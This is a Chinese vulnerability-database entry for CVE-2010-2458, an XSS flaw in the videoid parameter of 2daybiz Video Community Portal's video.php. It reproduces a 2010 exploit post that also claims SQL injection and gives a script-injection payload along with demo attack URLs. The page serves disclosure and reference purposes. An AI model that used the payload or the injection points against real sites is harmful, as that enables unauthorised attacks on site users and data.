2daybiz Video Community Portal Script 'video.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119543 漏洞类型 跨站脚本
发布时间 2010-06-22 更新时间 2010-06-29
CVE编号 CVE-2010-2458 CNNVD-ID CNNVD-201006-420
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/13970
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-420
|漏洞详情
2daybizVideoCommunityPortalScript1.0的video.php存在跨站脚本攻击漏洞。远程攻击者可以借助videoid参数注入任意的web脚本和HTML。
|漏洞EXP
1               ##########################################             1
0               I'm L0rd CrusAd3r member from Inj3ct0r Team            1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Video Community portal SQLi and XSS Vulnerable
Vendor url:http://www.2daybiz.com/
Version:1
Price:120$
Published: 2010-06-22
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, M4n0j, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team , Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

2daybiz Video Community portal is the ultimate solution for starting your video sharing and uploading community similar to YouTube, Daily Motion and Myspace Videos. This enterprise level video sharing software offers a powerful and rich featured solution. In this software members can upload videos, rate videos, tag videos, leave comments, edit uploaded videos, title and description set video as public/private, video play list, create channels, groups and favorite videos. 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:

*SQLi Vulnerable

DEMO URL:

http://www.site.com/products/videocommunity/video.php?videoid=[sqli]

*XSS Vulnerable

Parameter:'"--><script>alert(0x000872)</script>

DEMO URL:

http://www.site.com/products/videocommunity/video.php?videoid=[xss]

# 0day n0 m0re #
# L0rd CrusAd3r #
|参考资料

来源:XF
名称:videocommportal-video-xss(59639)
链接:http://xforce.iss.net/xforce/xfdb/59639
来源:BID
名称:41022
链接:http://www.securityfocus.com/bid/41022
来源:EXPLOIT-DB
名称:13970
链接:http://www.exploit-db.com/exploits/13970
来源:SECUNIA
名称:40280
链接:http://secunia.com/advisories/40280
来源:MISC
链接:http://packetstormsecurity.org/1006-exploits/2daybizvcp-sql.txt
来源:OSVDB
名称:65669
链接:http://osvdb.org/65669